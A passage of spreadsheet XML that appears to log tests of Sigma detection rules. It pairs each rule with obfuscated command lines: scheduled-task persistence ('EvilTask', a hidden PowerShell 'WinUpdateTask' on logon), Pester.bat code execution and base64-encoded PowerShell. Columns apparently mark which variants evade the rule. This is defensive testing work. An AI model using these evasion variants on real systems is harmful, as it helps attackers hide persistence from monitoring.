          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1874" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1874" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1875" ht="15.75" customHeight="1" s="42">
      <c r="A1875" s="43" t="n"/>
      <c r="B1875" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1875" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1875" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1875" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1875" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1875" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1875" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1875" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1875" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1876" ht="15.75" customHeight="1" s="42">
      <c r="A1876" s="43" t="n"/>
      <c r="B1876" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1876" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1876" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1876" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1876" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1876" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1876" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1876" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1876" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1877" ht="15.75" customHeight="1" s="42">
      <c r="A1877" s="43" t="n"/>
      <c r="B1877" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1877" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1877" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1877" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1877" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1877" s="43" t="n"/>
      <c r="J1877" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1877" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1878" ht="15.75" customHeight="1" s="42">
      <c r="A1878" s="43" t="n"/>
      <c r="B1878" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1878" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1878" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1878" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1878" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1878" s="44" t="n"/>
      <c r="J1878" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1878" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1879" ht="15.75" customHeight="1" s="42">
      <c r="A1879" s="43" t="n"/>
      <c r="B1879" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1879" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1879" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1879" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F1879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1879" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1879" s="44" t="n"/>
      <c r="J1879" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1879" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1880" ht="15.75" customHeight="1" s="42">
      <c r="A1880" s="43" t="n"/>
      <c r="B1880" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1880" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1880" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1880" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1880" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1880" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1880" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1880" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1880" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1881" ht="15.75" customHeight="1" s="42">
      <c r="A1881" s="43" t="n"/>
      <c r="B1881" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1881" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1881" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1881" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1881" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1881" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1881" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1881" s="43" t="n"/>
      <c r="J1881" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1881" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1882" ht="15.75" customHeight="1" s="42">
      <c r="A1882" s="43" t="n"/>
      <c r="B1882" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1882" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1882" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1882" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1882" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1882" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1882" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1882" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1882" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1883" ht="15.75" customHeight="1" s="42">
      <c r="A1883" s="43" t="n"/>
      <c r="B1883" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1883" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1883" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1883" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F1883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1883" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1883" s="43" t="n"/>
      <c r="J1883" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1883" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1884" ht="15.75" customHeight="1" s="42">
      <c r="A1884" s="43" t="n"/>
      <c r="B1884" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1884" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1884" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1884" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1884" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1884" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1884" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1884" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1884" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1885" ht="15.75" customHeight="1" s="42">
      <c r="A1885" s="43" t="n"/>
      <c r="B1885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1885" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1885" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1885" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1885" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1885" s="43" t="n"/>
      <c r="J1885" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1885" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1886" ht="15.75" customHeight="1" s="42">
      <c r="A1886" s="43" t="n"/>
      <c r="B1886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1886" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1886" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1886" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1886" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1886" s="43" t="n"/>
      <c r="J1886" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1886" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1887" ht="15.75" customHeight="1" s="42">
      <c r="A1887" s="43" t="n"/>
      <c r="B1887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1887" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1887" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1887" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F1887" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1887" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1887" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1887" s="43" t="n"/>
      <c r="J1887" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1887" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1888" ht="15.75" customHeight="1" s="42">
      <c r="A1888" s="43" t="n"/>
      <c r="B1888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1888" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1888" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1888" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1888" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1888" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1888" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1888" s="44" t="n"/>
      <c r="J1888" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1888" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1889" ht="15.75" customHeight="1" s="42">
      <c r="A1889" s="43" t="n"/>
      <c r="B1889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1889" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1889" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1889" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1889" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1889" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1889" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1890" ht="15.75" customHeight="1" s="42">
      <c r="A1890" s="43" t="n"/>
      <c r="B1890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1890" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1890" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1890" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1890" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1890" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1890" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1891" ht="15.75" customHeight="1" s="42">
      <c r="A1891" s="43" t="n"/>
      <c r="B1891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1891" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1891" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1891" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F1891" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1891" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1891" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1891" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1892" ht="15.75" customHeight="1" s="42">
      <c r="A1892" s="43" t="n"/>
      <c r="B1892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1892" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1892" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1892" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1892" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1892" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1892" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1893" ht="15.75" customHeight="1" s="42">
      <c r="A1893" s="43" t="n"/>
      <c r="B1893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1893" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1893" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1893" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1893" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1893" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1893" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1894" ht="15.75" customHeight="1" s="42">
      <c r="A1894" s="43" t="n"/>
      <c r="B1894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1894" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1894" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1894" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1894" s="44" t="n"/>
      <c r="J1894" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1894" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1895" ht="15.75" customHeight="1" s="42">
      <c r="A1895" s="43" t="n"/>
      <c r="B1895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1895" s="44" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1895" s="44" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1895" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1895" s="44" t="n"/>
      <c r="J1895" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1895" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1896" ht="15.75" customHeight="1" s="42">
      <c r="A1896" s="43" t="n"/>
      <c r="B1896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1896" s="44" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1896" s="44" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1896" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1896" s="44" t="n"/>
      <c r="J1896" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1896" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1897" ht="15.75" customHeight="1" s="42">
      <c r="A1897" s="43" t="n"/>
      <c r="B1897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1897" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1897" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1897" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ec JABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F1897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1897" s="4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897" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1897" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1898" ht="15.75" customHeight="1" s="42">
      <c r="A1898" s="43" t="n"/>
      <c r="B1898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1898" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1898" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1898" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EC JABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F1898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1898" s="4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898" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1898" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1899" ht="15.75" customHeight="1" s="42">
      <c r="A1899" s="43" t="n"/>
      <c r="B1899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1899" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1899" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1899" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F1899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1899" s="44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899" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1899" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1900" ht="15.75" customHeight="1" s="42">
      <c r="A1900" s="43" t="n"/>
      <c r="B1900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C1900" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D1900" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E1900" s="44" t="inlineStr">
        <is>
